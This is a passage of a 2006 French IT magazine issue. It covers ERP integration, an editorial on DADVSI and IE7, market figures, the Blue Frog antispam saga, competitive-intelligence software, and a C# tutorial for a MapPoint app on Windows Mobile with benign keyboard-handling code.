Il n’est pas le seul à émettre un avis prudent sur le domaine. Pascale Urvoas note aussi une complexité accrue des projets avec des questions sur l’orchestration de la solution (composants) et un niveau d’abstraction plus important.
Pour Christophe Raymond, la prudence est aussi de mise en pointant le problème de sécurité induit par les Web services et la faible adaptation sur le segment moyen du marché des middlewares pour réaliser l’opération. Il pense cependant que l’arrivée de ce type d’outils est plus ou moins inéluctable à moyen terme. Car les impacts sur les projets ne sont pas tous négatifs. En termes de déploiements, ces technologies permettent des démarrages plus rapides et réduisent singulièrement les délais de mise en œuvre.
Seul hic : ils demandent des compétences technologiques accrues et des connaissances fonctionnelles plus proches de celle d’un analyste ou d’un architecte que d’un développeur. Ainsi, on a vu apparaître des binômes pour les mises en œuvre avec un spécialiste technologique accompagnant un spécialiste métier.
Jean-Marc Lafin souligne aussi ces changements : « Auparavant, on pensait à l’intégration fonctionnelle métier. Maintenant, il faut aussi prendre en compte l’intégration technique avec un architecte technique pointu. Pendant 15 ans, le monde de l’ERP ne s’intéressait pas trop à la techno, qui n’était pas notre tasse de thé. Aujourd’hui, ce n’est plus possible. C’est un changement majeur. Cela devient très difficile d’avoir un homme de métier qui soit aussi un très bon architecte technique. Ce sera un point discriminant lors du choix d’un intégrateur. Avant, le client ne devait s’assurer que des compétences métier ; maintenant, il doit penser aussi aux compétences techniques. »
Sommaire
Réduire
RÉSEAUX & SÉCURITÉ

• Protégez votre serveur Web des hackers !
• PON face à Ethernet Actif pour les réseaux FTTH


SERVEURS & SYSTÈMES

• HP voit des blades partout !
• Mac OS X : Leopard sort de sa jungle


LOGICIELS & APPLICATIONS

• Le nouveau visage des ERP
• Intelligence économique : des outils pour collecter l’information stratégique
• La géolocalisation utile avec MapPoint sur votre SmartPhone


POSTE DE TRAVAIL

• Mac OS X et le poste client : quelques fonctions méconnues
• Google Calendar : un agenda de groupe à partager sur le Web


ITINÉRAIRES

• Avant-vente : des profils recherchés !
• Les grands éditeurs lancent leurs propres universités
• Livres : une sélection des derniers ouvrages pour se perfectionner en ASP.NET, EFS, IPSEC, SSL…


Edito
Réduire
Curiosités d’été

newstef26526_Copier5.gifLe téléchargement qui enrichit les majors • Ce luxe insensé de pouvoir choisir son navigateur Internet • La numérisation des bibliothèques à marche forcée • Et la nouvelle terreur high tech des « people »…

Voici quelques mois, nous écrivions que la loi dite DADVSI était – dès le départ – mal ficelée et qu’à vouloir contenter tout le monde, elle ne satisferait personne. Nous nous sommes trompés sur ce point, car les majors du disque sont certainement ravis de voir que le Conseil constitutionnel a durci certaines dispositions et que les internautes courent de nouveau le risque de se retrouver en prison pour téléchargement illégal.

Ironie du sort, ces dispositions sont annoncées quelques heures avant que la Sacem ne fasse état d’une augmentation de 4,2 % de son chiffre d’affaires, le téléchargement de sonneries sur téléphone ayant généré 5 millions d’euros, alors que le téléchargement de musique a peiné à dépasser les 700 000 euros, soit moins d’un millième du CA global (757,4 millions). En conclusion, et contrairement à ce qui est rabâché à longueur de journée par les majors, le téléchargement n’a pas encore ruiné l’industrie musicale, loin s’en faut.

Quasi simultanément, Microsoft annonce que le nouveau navigateur Internet Explorer 7 sera disponible sous forme de mise à jour « prioritaire » de Windows. Les réactions à cette décision sont extrêmement partagées. Si certains se félicitent, d’autres, au contraire, se montrent fort virulents et affirment qu’il s’agit d’une nouvelle provocation de l’éditeur, notamment vis-à-vis de la Commission Européenne. En effet, même si l’installation du logiciel ne sera pas automatique, sa présence dans le PC le sera de facto, qu’on le veuille ou non. Dans ces conditions, nous ne serions pas autrement surpris que certains concurrents s’insurgent contre cette décision et saisissent les autorités de régulation avec, à la clé, une nouvelle confrontation.

Décidément, Google aime l’été. Après moult tergiversations et alors que des litiges subsistent avec certaines agences de presse concernant l’exploitation faite de leurs dépêches dans Google News, le moteur de recherche annonce un projet de très grande envergure avec une université de Californie en vue de numériser leur bibliothèque : un pas de plus vers la bibliothèque numérique universelle, dont Google s’est fait le chantre et qui continue de susciter des réactions outragées sur la Planète.

Finalement, l’information la plus curieuse de cet été nous vient de l’université de Manchester : « Vous viendrait-il à l’idée de coller sur votre joue plusieurs fois par jour la semelle de votre chaussure ? », demandent nos confrères du Point. Non, et pourtant c’est ce que nous faisons avec nos téléphones portables, lesquels contiennent autant de milliers de microbes que l’envers d’un soulier ou d’une cuvette de toilettes… J’imagine déjà les effets dévastateurs de cette étude sur nos «people » et leurs manies bizarres. Changer de téléphone après chaque appel, ou se doter d’un stérilisateur de portables. Voilà des perspectives commerciales inédites ! On attend désormais impatiemment les résultats d’analyses de nos claviers d’ordinateurs.

    Stéphane Larcher
Repères
Réduire
Repères matériel
• Mémoire DDR 1Go 266Mhz : 70,3€
• Clé USB 2.0 1 Go : 18,9€
• PC base AMD Sempron 2800 + : 222€
• Portable Packard Bell Easynote R1933  Celeron 1,5 GHz : 499,99€
• Téléphone mobile Nokia 1100 : 50,71 €
• Prix processeur : - 21,46 % (moyenne)

(Les prix annoncés sont les moins chers fournis par les vendeurs en ligne et comparateurs de prix à la fin du mois de juillet. Ils ne sont pas les prix conseillés à la vente au public ou les prix que peuvent proposer votre revendeur habituel).

Equipements en France
• PC : 12 914 000 foyers, 50,6 %
• Accès Internet : 9 981 000, 38,8 %

Marché mondial
• Publicité sur le Net : 10,4 Mds €, + 57 %
• Ventes PC monde T2 2006 : entre +9,7 % (IDC) et 11 % (Gartner)

Emplois
Salaires moyens annuels
• Analystes programmeur : 26 600€
• Administrateur réseaux : 27 000 €
• Consultant SI : 28 200€
• Administrateur base de données : 28 300 €
• Chef projet MOE : 43 500 €
• DSI : 91 800 €
• Evolution moyenne 2005 : + 4,5 %
• Indice Syntec : 212,6

Cet indice se calcule en multipliant le prix initial par le rapport entre le dernier indice Syntec et l’indice initial à la date du contrat pour obtenir le prix révisé.

Structure emploi
• 20 % de femmes
• Turn-over : 14 %




BUSINESS
Le dynamisme retrouvé du marché des logiciels RH

reperes.jpgDans la dernière livraison de son enquête annuelle sur le marché français des logiciels et services en ressources humaines, Pierre Audoin Consultants retrouve un certain optimisme. « L’année 2005 devrait afficher une reprise des investissements (+ 6 %) après une année 2004 morose ».
Ce marché a représenté un chiffre d’affaires 1,33 Mds € en 2005 et devrait culminer à 1,44 Mds € l’année prochaine. Les principaux achats s’intéressent à consolider des tâches administratives. Selon l’étude, les produits s’étoffent pour répondre à de nouveaux besoins comme la gestion des carrières et de la mobilité, le recrutement, le pilotage. Ces besoins se font principalement jour dans le secteur public du fait de la mise en oeuvre de la LOLF, de la rationalisation qui en découle et de la gestion des départs en retraite.
Dans le secteur privé, les besoins métiers et la recherche d’une plus grande efficacité sont les moteurs de ces investissements.
Les projets cherchent aujourd’hui à tirer parti des référentiels mis en place. Ainsi les projets dans la gestion des compétences, des carrières et la formation sont nombreux.
L’offre sur le marché s’articule autour de deux grands types d’acteurs : sociétés de services et les éditeurs spécialisés ou généralistes ;
Sur les grands comptes, ADP-GSI, IBM, Sopra Group, Cap Gemini, Unilog, Accenture, Arinso dominent le secteur des services. HR Access, SAP, Oracle gardent la prééminence dans le secteur des logiciels.
Sur le secteur des PME, la concurrence se fait plus rude. Sage et Cegid/Ccmx renforcent leurs positions alors que de grands acteurs comme SAP ou HR Access commencent à attaquer cette cible.


BUSINESS
Les priorités des DSI américains
Dans une étude récente, Forrester Research indiquait les priorités des directeurs des services informatiques en Amérique du nord. Celles-ci semblent désormais très proches de celles avancées par les responsables informatiques en Europe.
La réduction des coûts reste la première préoccupation (36 %). La sécurisation de l’environnement informatique vient tout de suite après avec 28 %, à égalité avec la problématique de l’intégration entre les applications.
Ces questions sont largement devant les débats techniques. Seuls 14 % des responsables interrogés mettent en avant la volonté de s’appuyer plus sur les standards.
A relier avec la problématique de réduction des coûts, Ils sont entre 11 et 10 % à souhaiter réduire le nombre de fournisseurs de logiciels d’infrastructure et d’applications.
Malgré le battage réalisé sur la montée en puissance du logiciel à la demande, 4 % seulement songent à migrer ou à utiliser une solution de ce type.
Chronique Futur
Réduire
Les affres de la lutte antispam

Pour avoir réussi à s’opposer efficacement au spam, une start-up s’est retrouvée victime d’un tel assaut qu’elle a dû suspendre ses services !

La mésaventure qui est advenue à la société israélienne Blue Security a de quoi donner à réfléchir… Après une série de victoires majeures, cette start-up qui avait défini un outil d’une grande efficacité contre le spam a dû plier face à l’ampleur de la contre-attaque. Une défaite qui pourrait pourtant marquer l’aube de grandes victoires, car elle a permis de mieux mesurer les moyens de l’ennemi et comment parvenir à un résultat plus solide dans le futur.
Blue Security avait mis au point un système de type « œil pour œil, dent pour dent », baptisé Blue Frog. Une fois abonné à ce service, chaque courrier indésirable reçu faisait l’objet d’un message d’avertissement adressé au prestataire Internet du spammeur. Si le fournisseur d’accès ne s’engageait pas à policer de lui-même l’émetteur de spam, il faisait alors l’objet d’un afflux de messages des abonnés de Blue Frog. Il en résultait pour le prestataire ce que l’on appelle un « déni de service », soit l’impossibilité de fonctionner, ses ordinateurs se voyant saturés de messages à traiter.
Avec ses cinq cent mille abonnés, Blue Frog avait acquis une force de frappe telle, qu’il avait réussi à faire plier six des dix plus gros spammeurs de la planète – ceux-ci s’abstenaient désormais d’adresser leurs publicités aux abonnés de Blue Frog.
Une société de spam sise en Russie a pourtant décidé de relever le défi. Lors d’un chat sur ICQ, son dirigeant, connu sous le pseudonyme de PharmaMaster, a d’ailleurs déclaré : « Blue Security a trouvé la solution adéquate contre le spam et je ne peux laisser cela continuer. »
La contre-attaque de PharmaMaster s’est d’abord traduite par un accroissement de spams vis-à-vis des abonnés Blue Frog, assortis de messages de nature diffamatoire. Il affirmait notamment que, bien que Blue Security prétende être basée aux États-Unis, ses bureaux se trouvaient en fait à Tel-Aviv et qu’ils abriteraient des Juifs d’origine russe qui étaient eux-même auparavant des spammeurs. Des messages de menace ont suivi : les utilisateurs de Blue Frog pouvaient s’attendre à recevoir de plus en plus de spams jusqu’à ce qu’ils se désabonnent.
Évidemment, Blue Security pensait appliquer sa tactique habituelle de déni de service. Pourtant, PharmaMaster semble avoir réussi à soudoyer un haut cadre d’un fournisseur d’accès, afin de créer un Blackhole (trou noir), une technique permettant d’isoler un site d’attaques externes.
PharmaMaster s’en est alors pris aux prestataires d’accès de Blue Frog afin de saturer leurs serveurs. L’attaque a été si forte que Blue Security a temporairement choisi de se faire accueillir sur un blog géré par la société SixApart, éditeur du logiciel Typepad. L’assaut a alors été redirigé vers cette plate-forme et en conséquence, durant quatre heures, lors de la nuit du 3 au 4 mai, les millions de blogs gérés avec Typepad ont été bloqués – il était impossible de les mettre à jour !
Blue Security s’est alors rabattu vers un autre fournisseur d’accès, Prolexic, ce dernier s’étant targué de protéger ses clients contre les dénis de service. Pharmamaster a aussitôt riposté en s’en prenant à un échelon plus haut : il a alors bombardé de messages UltraDNS, le service de résolution de nom de domaine gérant des firmes, telle que Prolexic, mais aussi bien d’autres sociétés importantes du Web, comme Oracle. Toutes ont alors subi les dégâts d’une telle attaque. De guerre lasse, Blue Security a jugé préférable de supprimer le service Blue Frog !
PharmaMaster a la dent dure et n’est pas satisfait d’une telle victoire. Il a alors menacé de s’en prendre à tous les PC sur lesquels le logiciel Blue Frog était encore installé et de les inclure, à leur insu, dans son réseau de serveurs de spams. Les utilisateurs du logiciel antispam ont donc reçu le conseil de le désinstaller au plus vite.
Bien que la bataille ait été perdue, elle a amené une prise de conscience des moyens à mettre en œuvre s’il fallait demain réitérer une solution à la Blue Frog. Du coup, c’est la communauté Open Source qui a repris le flambeau et lancé un projet baptisé Frognet qui fonctionnerait selon le même principe avec une différence essentielle : le serveur opérera en « peer-to-peer » plutôt qu’en mode centralisé, ce qui devrait le mettre à l’abri des tentatives de déni de service. L’actualité de la lutte antispam risque d’être riche en rebondissements au cours des mois à venir…


La lutte de la petite grenouille bleue n’est pas terminée. Le projet Okipipi, une petite grenouille venimeuse d’Amérique du Sud, de la même couleur, reprend le flambeau de la lutte contre les spammeurs par la fédération d’anciens utilisateurs de Blue Frog et de responsables de sécurité informatique d’entreprises à partir de serveurs cachés.
Intelligence économique
Réduire
Des outils pour collecter les informations stratégiques
Par Henri Gillarès-Calliat - Copyright L'INFORMATICIEN, tous droits réservés

Intelligence économique et veille technologique défrayent fréquemment la chronique. Ces activités parfois « sulfureuses » et procèdent cependant toutes d'une démarche : la recherche d’informations. Accompagnant le développement de l’informatique, un grand nombre d’outils ont vu le jour, ils permettent à tout un chacun de se glisser sinon dans la peau d’un espion au moins dans celle d’un collecteur d’informations stratégiques pour son entreprise.

L’intelligence économique se présente sous plusieurs facettes. Elle peut être définie comme l’ensemble des actions de recherche, de traitement et de distribution de l’information utile aux acteurs économiques. Elle est composée  d’un ensemble de concepts, d’outils, de méthodologies et de pratiques permettant de mettre en relation, de façon adéquate, différentes connaissances et informations dans la perspective de la maîtrise et du développement de la dynamique économique. Elle constitue aussi une technique de détection des menaces. Globalement, son objet est de relier entre eux plusieurs domaines pour servir aux objectifs tactiques et stratégiques de l’entreprise. Enfin, c’est un processus de collecte, traitement et diffusion de l’information qui a pour objet la réduction de la part d’incertitude dans la prise de toute décision stratégique.


Différence entre la veille et l’intelligence économique

Frontière ténue, peut-être parce que l’expression « Intelligence économique » importé de l’anglais, où la signification du mot est différente qu’en français. La veille est une étape de l’intelligence économique. Elle est le processus allant de la définition du champ de la surveillance à l’analyse et la diffusion d’informations. L’intelligence économique pourrait être définie comme un ensemble incluant non seulement ce processus, mais contribuant aussi à la dimension stratégique des décisions de la direction d’une entreprise. La veille pourrait être comprise comme processus réactif alors que l’intelligence économique est un processus pro-actif.
La veille, elle-même, peut revêtir divers aspects comme, par exemple, la veille concurrentielle qui permet de pister les démarches actives, le déploiement vers d’autres secteurs d’activités, les fausses pistes et leurres destinés à égarer la concurrence. Les intrusions diverses, les dépôts de brevets, les travaux de recherche de la part de concurrents directs et indirects intéressent nécessairement l’entreprise. En outre, elle permet de mieux connaître les techniques de vente et de distribution des concurrents ou leur politique de communication.
Pour une entreprise, elle consiste à étudier des informations stratégiques pour permettre d’anticiper les innovations et les évolutions. Elle a pour but d’exploiter l’information, en extrayant de la masse disponible uniquement les données adéquates et ayant la capacité d’influencer les décisions. Elle permet d’éviter les erreurs d’appréciation, de faciliter les décisions, de voir ce qui s’est déjà fait et de discerner les opportunités.
Le veilleur est généralement un chef de projet qui réunit les multiples compétences nécessaires pour mettre en place un système comprenant plusieurs technologies. Son rôle ne sera pas directement de récolter l’information, mais plutôt de donner aux experts de l’entreprise les moyens de travailler sur l’information.
On définit une veille selon sa finalité (opérationnelle / stratégique), le nombre de destinataires, l’étendue des thèmes à surveiller, la nature et la diversité des sources, le niveau de valeur ajoutée, la qualification et l’analyse de l’information pertinente, la mise à disposition des données, etc. Selon ses caractéristiques, on décide du nombre de ressources que l’on doit lui affecter.


Que recouvre concrètement le terme d’intelligence économique ?

L’intelligence économique regroupe tous les moyens légaux et les techniques (informatique – Internet) mis en œuvre par une entreprise pour collecter des informations à caractère économique sur sa concurrence, sur un marché, etc. Le Commissariat général au plan, donne la définition suivante de l’IE : ensemble des actions de recherche, de traitement et de diffusion (en vue de son exploitation) de l’information utile aux acteurs économiques. Certaines englobent également le déploiement de moyens de protection contre les tentatives externes de vol d’informations, d’espionnage, d’intrusion, etc.


Le cycle de l’intelligence économique

Il fonctionne de la manière suivante :

• La question - Elle est définie par la direction de l’organisation, elle constitue la base du cycle.

• La collecte d’informations - Elle est pistée à la fois dans les réseaux internes et externes et dans la mémoire de l’intelligence économique. Elle peut également provenir des sources comme les documentations publiques, médias, salons et rencontres, brevets, normes, etc.

• L’analyse et la structuration - Les informations collectées sont analysées par les experts de la société, par un institut spécialisé ou parfois par un logiciel métier.

• La diffusion - Les informations analysées et structurées sont diffusées aux personnes concernées et notamment à la direction qui pourra définir de nouvelles orientations ou questions.


Les composants de la mise en œuvre de l’intelligence économique

L’intelligence économique repose sur des outils de veille destinés à collecter l’information. Ces outils alimentent une base de données associée au système de gestion des connaissances. Celui-ci tire parti des connaissances produites par l’entreprise, mais aussi de celles qui viennent à elle, pour en extraire les plus importantes. Une analyse de ces informations est ensuite nécessaire. Les outils décisionnels (BI) entrent en force dans le domaine de l’intelligence économique. Par l’étendue des données à traiter et leur complexité, ils permettent de mettre en lumière des indicateurs clés et des tableaux de bord.
Les systèmes d’information sont donc au cœur des problématiques liées à l’intelligence économique. L’enjeu n’est plus seulement de collecter l’information de façon pertinente, mais d’en extraire les renseignements utiles à l’entreprise. Malheureusement, la masse d’informations et de contenus sur les réseaux augmente sans cesse. Cette surinformation protège elle-même de plus en plus les données. Il devient plus difficile d’obtenir un résultat en lançant simplement une requête sur un moteur de recherche, un méta-moteur comme Webseeker, Copernic, Kartoo, un aspirateur de sites du type de Teleport Pro ou un agent dit intelligent comme celui de Copernic.


Outils de veille et agents intelligents

De nombreux  résultats incomplets, obsolètes, non fiables viennent de plus en plus souvent altérer la qualité de ces recherches. On constate alors une nette différence de résultats entre les solutions de base et les outils spécialisés de veille stratégique. La veille nécessite une surveillance continue des sources d’information que l’on a choisi d’examiner. Dans le cadre, une recherche par un moteur, tel que Google, permettra d’obtenir un résultat ponctuel à un instant T. Les agents intelligents, eux, effectueront ces mêmes tâches de recherche à la façon d’un robot, de manière automatique et programmée.
L’intérêt réel des outils de veille stratégique réside dans leur capacité à analyser ces résultats, à mettre en évidence les modifications, tout en maintenant ces ensembles de résultats à jour en permanence : ils travaillent donc par cycle de veille avec archivage et comparaison, la remontée d’informations n’étant que l’une des étapes de ce cycle.


Le cycle de veille

L’étape préalable d’un cycle de veille consiste à bien définir ses champs de recherche et dans quel domaine on veut effectuer sa veille. Viennent ensuite le recensement, la sélection, puis la programmation de sources reconnues. Les outils de veille ont un avantage considérable car ils permettent d’atteindre des cibles inconnues pour les outils de recherche classiques. On évoque alors le Web invisible ou le Web profond. Les bases de données non référencées, les archives non indexées, les sites payants, les moteurs spécialisés, les portails spécialisés, les bibliothèques en ligne, les news groups (groupes de discussion), les mailing lists (listes de diffusion), représenteraient selon les professionnels du secteur entre 80 et 90 % de la masse d’informations présente sur les réseaux.

tablo2.jpg


Les solutions

Pour aider les spécialistes et les entreprises, un certain nombre de solutions sont à leur disposition : confier purement et simplement la demande de renseignement à une société spécialisée ; utiliser un outil « haut de gamme ». Une autre solution consiste à faire le travail soi-même, ou de le confier à une personne de l’entreprise qui se fera assister de quelques logiciels que l’on trouve dans le domaine public ou en shareware.   
Nous ne nous étendrons pas sur le premier cas, il suffit à l’entreprise candidate de prendre contact avec une « officine spécialisée », qui lâchera ses cyber-détectives sur les réseaux afin de réunir les informations dont ont besoin leurs clients. La note est fréquemment « salée » !
En seconde position, on se tourne vers des éditeurs spécialisés en intelligence économique, afin d’acquérir la solution la plus adaptée à l’entreprise. Ici, nul besoin de se tourner systématiquement vers une solution « made in USA », les éditeurs hexagonaux ne sont pas en reste. Les produits réservés aux grands comptes peuvent atteindre des sommes respectables, comme Verity, qui peut friser les 70 000 euros. Entre le freeware et certains hauts de gamme, comment la PME peut-elle s’équiper ? Les solutions de veille s’articulent essentiellement autour de deux fonctions complémentaires que sont, d’une part, l’acquisition de documents ou de sources d’information couplées à un système d’alerte et, d’autre part, l’indexation et/ou la catégorisation des documents.
Le tableau ci-dessous met en évidence l’environnement dans lequel évoluent ces solutions, les fonctionnalités de capture des contenus en fonction de leur nature (HTML, animation Flash…). Sont également évoquées les fonctionnalités de catégorisation automatique des documents et la présence ou non d’un moteur d’analyse sémantique. La possibilité d’établir un résumé automatique est également précisée.
Parmi les produits cités, mise à part Copernic et Visigot, tous permettent de détecter automatiquement les modifications d’un contenu d’une page ou d’un site Web. Cette fonctionnalité constitue la base d’une solution de veille. Concernant l’éventail d’alertes qu’il est possible de mettre en place, signalons que la modification d’un lien dans une page Web est maîtrisée par l’ensemble des solutions. La possibilité de demander une alerte en fonction du volume de contenu modifié dans une page n’est permis que par certaines solutions.
Les possibilités de catégorisation automatique des documents sont partagées par une grande majorité de solutions, de même que les  fonctionnalités d’analyse sémantique qui reposent sur des algorithmes de traitement linguistique. Statistique et de logique floue, catégorisent et classifient un document au travers de simples mots clés, mais ils prennent aussi en considération le contexte et le sens de la narration. Plus rares et complexes, les capacités de résumé automatique ne sont pas implémentées au sein de tous les produits. Enfin, on remarque une grande variété de systèmes d’exploitation sous lesquels les solutions de veille sont invoquées. Une bonne moitié ne peut l’être que sous Windows (XP ou 2000). Globalement, la compatibilité avec les principales bases de données du marché assure une bonne interopérabilité des progiciels avec l’environnement applicatif de l’entreprise. L’accès s’effectue via une interface Web, leur prix est directement lié aux fonctionnalités requises et aux nombre de licences octroyées.
À l’heure du choix, les regards se tournent vers des sociétés françaises comme Digimind qui, avec ses 575 % de croissance sur 5 ans, se place largement en tête des éditeurs européens de logiciels de veille. Digimind présente un chiffre d’affaire en hausse de 70 % en 2005. Fort de ces résultats, l’éditeur européen de plates-formes logicielles de veille stratégique et d’intelligence économique est le plus performant du marché.
La raison d’une telle performance ? Digimind est le seul éditeur spécialisé à 100 % dans la veille stratégique depuis près de dix ans. Elle permet de répondre à tous les besoins de veille dans tous les secteurs d’activité. Elle répond aussi bien aux besoins d’un veilleur isolé qu’à une entreprise qui souhaite industrialiser ses processus de veille. Cette approche séduit les grands comptes, mais également un nombre croissant de PME innovantes qui souhaitent maîtriser en interne leurs dispositifs de veille et en faire un avantage compétitif de premier plan.
De son côté, pour BEA-Conseil (Bruno Etienne et Associés-Conseil), créée en 1995, alors société d’ingénierie informatique, la spécialisation sur la veille débute en 2002 avec Eurocopter, qui souhaite indexer des sources externes à l’entreprise. De cette demande naît le premier outil de gestion électronique de documents (GED), « Kbdoc ». Depuis, Kbdoc est devenu « Kbcraw ». Le succès de cette solution qui a séduit plus de 200 clients, a poussé la société à se spécialiser dans l’édition d’outils de veille et d’intelligence économique sur le Net
Ces deux acteurs français n’ont, à part Albert, Documentum ou Isocop, pas réellement de concurrence dans l’Hexagone. On peut néanmoins citer des solutions comme Autonomy-Verity, plus importantes en termes d’installation et de prix (de 50 000 à 100 000 euros le ticket d’entrée).
Le second tableau est consacré aux outils d’intelligence économique, de veille technologique ou de recherche. Tout ces produits se caractérisent par leur mode de distribution, du payant en téléchargement, au shareware, en passant aussi par le freeware. Aucun d’entre eux ne constituent une solution complète avec moteur d’analyse et intelligence artificielle. Cependant, ces produits intéressants sont, par exemple, spécialisés dans la recherche générale avec Meta moteurs (Tiny search Engine, Copernic), la veille technologique et la surveillance comme Spector ou Novobot. Certains logiciels seconderont bien les services financiers (Analog x Cote, Diligent Dingo). Une attention particulière est à octroyer à NewsBin, dont la finalité est d’effectuer des recherches fines sur les forums et les news groups. Bien que n’étant pas à proprement dit de vrais systèmes de veille, ces outils que l’on peut le plus souvent essayer un certain temps gratuitement peuvent d’avérer d’une aide précieuse.
Enfin, pour mémoire, on citera les principaux éditeurs (liste non exhaustive) de veille Internet : Aignes, Albert, Alogic, Copernic, Datops, Digimind, Intelliseek, Sinequa, Verity, Wysigot. Ils sont complétés dans le système d’information de l’entreprise par des éditeurs d’analyse décisionnelle comme Business Objects, Cognos, Hummingbird, IBM, Informatica, Information Builders, Microsoft, Oracle, SAP, SAS...


tablo1.jpg
Développement
Réduire
La géolocalisation utile avec MapPoint sur votre SmartPhone
Par Frédéric Milliot - Copyright L'INFORMATICIEN, tous droits réservés

Développer pour Windows Mobile, rien de plus facile avec DotNet. Utiliser un service Web XML sophistiqué tel que Microsoft MapPoint, rien de compliqué non plus. Et les deux combinés ? Une vraie réussite, associant simplicité, élégance et efficacité !

Nous avons souvent défendu l’idée, dans ces colonnes, que l’investissement d’un apprentissage conjoint de DotNet et de C# était extrêmement rentable en termes de productivité et de fonctionnalités. En voici un exemple probant avec le projet que nous vous présentons aujourd’hui : une application de géolocalisation pour SmartPhone Windows Mobile. Ce projet combine deux dimensions technologiques. La première, évidemment, c’est la plate-forme. Développer pour un SmartPhone implique une approche radicalement nouvelle de la question des interfaces homme-machine, une approche restreinte où la grande difficulté consiste à savamment arbitrer entre fioritures et efficacité. La seconde, c’est l’utilisation d’un service Web. Pour les besoins de la cause, nous utiliserons MapPoint, un service proposé par Microsoft, qui offre globalement toutes les fonctions de localisation et de navigation qu’on peut trouver sur les modules GPS embarqués dans nos voitures – avec la détection des signaux satellites en moins.  

Nous allons donc, sans plus tarder, créer une application autonome qui offrira, directement sur l’écran de nos SmartPhones, deux services très utiles. D’une part, la saisie d’une simple adresse générera l’affichage d’une carte correspondant à l’adresse en question, avec un petit symbole visuel pour repérer la localisation du point recherché sur le plan. En adaptant l’interface proposée, vous pourrez même zoomer cette carte, comme sur les sites Web spécialisés. D’autre part, la saisie de deux adresses générera le traçage d’une route, la plus simple, reliant le point A au point B. Cette route sera tracée sur une carte, ou plus exactement un plan détaillé de la zone comprenant les deux points. Pour des raisons de simplicité, nous nous limiterons au traçage d’itinéraires entre deux adresses d’une même ville. Mais sur cette base, rien ne vous empêche, ensuite, d’affiner l’application selon vos besoins. Comme à l’accoutumée, l’ensemble du code source de l’application est disponible sur notre serveur en téléchargement gratuit.  


Téléchargez les bons SDK

Quelques pré-requis avant de plonger dans le vif du sujet. D’abord, il ne vous faut pas nécessairement un SmartPhone Windows Mobile pour exécuter, tester et améliorer l’application. Si vous disposez d’un IDE C# compatible DotNet 2.0 (Visual Studio 2005 ou Borland Developer Studio 2006), il vous faut simplement les composants et SDK ad hoc, c’est-à-dire le Microsoft .Net Compact Framework 1.0SP3 Developer, le Microsoft .Net Compact Framework 2.0 et le Microsoft Device Emulator, quelle que soit sa version. Ces éléments sont disponibles en téléchargement gratuits sur le site MSDN (www.msdn.com).

Grâce à eux, vous verrez apparaître sur l’écran de votre PC un émulateur de SmartPhone (celui qui figure sur nos captures). Cet émulateur, qui sert de cible lors de la génération d’exécutables, est beaucoup plus pratique que l’appareil en phase de développement. Primo, parce qu’en l’utilisant on n’a pas besoin de charger à chaque fois la mémoire du téléphone – qui de ce fait reste disponible pour tous ses usages ! Secundo, parce que les phases de débogage et de mises au point graphiques prennent beaucoup moins de temps que lorsqu’elles sont effectuées sur la même machine. Cet émulateur offre deux résolutions d’écran, qui correspondent à celles que proposent la plupart des téléphones actuels : 176 x 220 et 240 x 320 (QVGA). Cette fois encore, pour des raisons de simplicité, nous nous limiterons à la première.
Deuxième pré-requis, puisque nous allons utiliser le service Web MapPoint de Microsoft, il vous faut tout d’abord le SDK correspondant (MapPoint Web Service SDK 4.1), téléchargeable gratuitement à l’adresse http://msdn.microsoft.com-/mappoint. Il s’agit d’un petit package (environ 5 Mo) qui s’installe automatiquement. Il vous faut également un abonnement au service MapPoint. Microsoft a eu la bonne idée – pour les développeurs qui ne sont pas abonnés MSDN et ne bénéficient donc pas, à ce titre d’un an de service gratuit toutes options – de prévoir des comptes « développeurs » eux aussi tout à fait gratuits. Pour obtenir le vôtre, rendez-vous à l’adresse :
https://mappoint-css.partners.extranet.microsoft-.com/MwsSignup/Eval2.aspx

… et remplissez le formulaire. Quelques heures seront nécessaires pour que le compte soit effectivement disponible, contrepartie finalement raisonnable à la gratuité de la chose. Une fois cette formalité accomplie, toutes les conditions sont réunies pour que nous puissions commencer.


Les spécificités de l’interface Windows Mobile

Passer du développement Windows classique au développement Windows Mobile a quelque chose d’exotique. Il faut en effet oublier la souris, et de ce fait les boutons. Si c’est la première fois que vous développez une application SmartPhone, vous verrez, c’est assez dépaysant. Les seules zones d’interactions sont les zones de saisie de texte, ce qui limite sévèrement les possibilités fonctionnelles et oblige à une certaine créativité. Oubliez aussi les fenêtres multiples : on n’en a qu’une à disposition, et elle offre un espace d’affichage fort limité. Autre difficulté, il faut prendre en compte le fait que l’utilisateur ne dispose la plupart du temps que d’un clavier restreint. Cette contrainte d’ergonomie est renforcée par le fait qu’un écran Windows Mobile n’offre que deux menus possibles, qui peuvent toutefois ouvrir sur une arborescence – courte – de sous-menus. La navigation entre ces deux menus principaux se fait avec des touches dédiées, situées juste en dessous, ainsi qu’avec le joystick du téléphone pour le parcours des sous-options.

De ce fait, une application Windows Mobile reste, lorsqu’on la simplifie au strict minimum, une boucle événementielle infinie avec une porte de sortie (la méthode Close de la fenêtre) et un aiguillage associant des fonctions à des touches du clavier. Voici, par exemple, une méthode typique de parsing des entrées clavier – méthode généralement appelée à partir de la méthode gérant l’événement KeyDown de la fenêtre :

int _HandleUserInput(KeyEventArgs e)
{
  int i;

  // Retour si une condition d’interaction n’est pas remplie
  if (condition != 1)
    return (-1);
  // Traitement des entrées
  switch (e.KeyCode)
  {
  case Keys.F1:         // bouton de fonction gauche
    // ici votre code.
    break;

  case Keys.F2:         // bouton de fonction droit
    break;

  case Keys.Up:       // touches du joystick
  case Keys.Down:   
  case Keys.Left:   
  case Keys.Right:  
  case Keys.Enter:
    // ici votre code.
    break;

  case Keys.D1:        // touches du clavier téléphonique
  case Keys.D2:
  case Keys.D3:
  case Keys.D4:
  case Keys.D5:
  case Keys.D6:
  case Keys.D7:
  case Keys.D8:
  case Keys.D9:
  case Keys.D0:
    // ici votre code.
    break;

  case Keys.F8:         // touche *
    // ici votre code.
    break;

  case Keys.F9:         // touche #
    // ici votre code.
    break;
  }
  // Retourne "OK".
  return (0);
}


Une seconde approche, plus appropriée pour les applications où le clavier joue moins un rôle de déclenchement d’événements que de saisie d’informations, consiste à ne gérer que les appels aux menus. C’est cette approche que nous retiendrons pour notre application. Elle a ceci de plus rapide que les options des menus peuvent être associées directement à des touches du clavier. Il suffit alors de ne gérer que les méthodes correspondant à chacune des options des menus, quelle que soit la façon dont l’utilisateur les appelle (boutons de fonctions, déplacements avec le joystick ou touches du clavier numérique). En voici une illustration :

private void menuItem1_Click(object sender, System.EventArgs e)
{    
  // ici votre code.
}

private void menuItem2_Click(object sender, System.EventArgs e)
{    
  // ici votre code.
}


